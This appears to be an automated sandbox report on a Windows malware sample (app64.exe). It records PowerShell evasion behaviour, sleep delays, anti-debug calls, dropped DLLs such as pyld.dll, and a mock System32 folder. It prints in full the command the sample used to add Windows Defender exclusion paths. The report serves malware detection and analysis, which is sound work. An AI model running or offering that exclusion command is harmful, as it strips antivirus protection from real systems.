Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (identical entry repeated 10 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5061
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4774
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6281
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3579
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7412
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7423
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7609
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1988
Source: C:\Windows\System32\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\Public\pyld.dll
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows\System32\svchost.exe API coverage: 1.2 %
Source: C:\Windows\System32\console_zero.exe API coverage: 1.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep count: 5061 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep count: 4774 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep count: 6618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848 Thread sleep count: 3027 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep count: 6575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960 Thread sleep count: 3150 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1560 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3836 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648 Thread sleep count: 6281 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080 Thread sleep count: 3351 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 2472 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684 Thread sleep count: 3579 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128 Thread sleep count: 1765 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5240 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592 Thread sleep count: 7412 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844 Thread sleep count: 2074 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 6360 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 Thread sleep count: 7423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep count: 2154 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824 Thread sleep count: 7609 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824 Thread sleep count: 1988 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6608 Thread sleep count: 116 > 30
Source: C:\Windows\System32\timeout.exe TID: 2824 Thread sleep count: 143 > 30
Source: C:\Users\user\Desktop\app64.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (identical entry repeated 6 times)
Source: C:\Windows\System32\svchost.exe Code function: 28_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h 28_2_64946F50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError, 34_2_00007FF74713C568
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 34_2_00007FF74713C5DC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (identical entry repeated 10 times)
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 60000
Source: C:\Windows\System32\console_zero.exe Thread delayed: delay time: 46000 (identical entry repeated 2 times)
Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}_
Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: powershell.exe, 00000003.00000002.2256489419.000002713D1A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3268859281.000001D8E782B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2620974839.000001801B68B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\app64.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\svchost.exe Code function: 28_2_649461C0 IsDebuggerPresent,RaiseException, 28_2_649461C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free, 28_2_00007FF8B83AFC30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF7DF111180
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF11B2E0 SetUnhandledExceptionFilter, 0_2_00007FF7DF11B2E0
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF115349 SetUnhandledExceptionFilter, 0_2_00007FF7DF115349
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00007FF67A0E1B5C
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1880 SetUnhandledExceptionFilter, 10_2_00007FF67A0E1880
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FF67A0E1B5C
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E1880 SetUnhandledExceptionFilter, 13_2_00007FF67A0E1880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_64947650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 28_2_6828C940
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FA0C08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00007FF8A7FA0C08
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F92CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8A7F92CA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8A935EE70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935FA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00007FF8A935FA50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8B83C9E30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713DE40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_00007FF74713DE40
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74714AE5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00007FF74714AE5C
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_00007FF8B83C9E30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83CA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00007FF8B83CA8B4

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_2124.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6620.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_2124.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
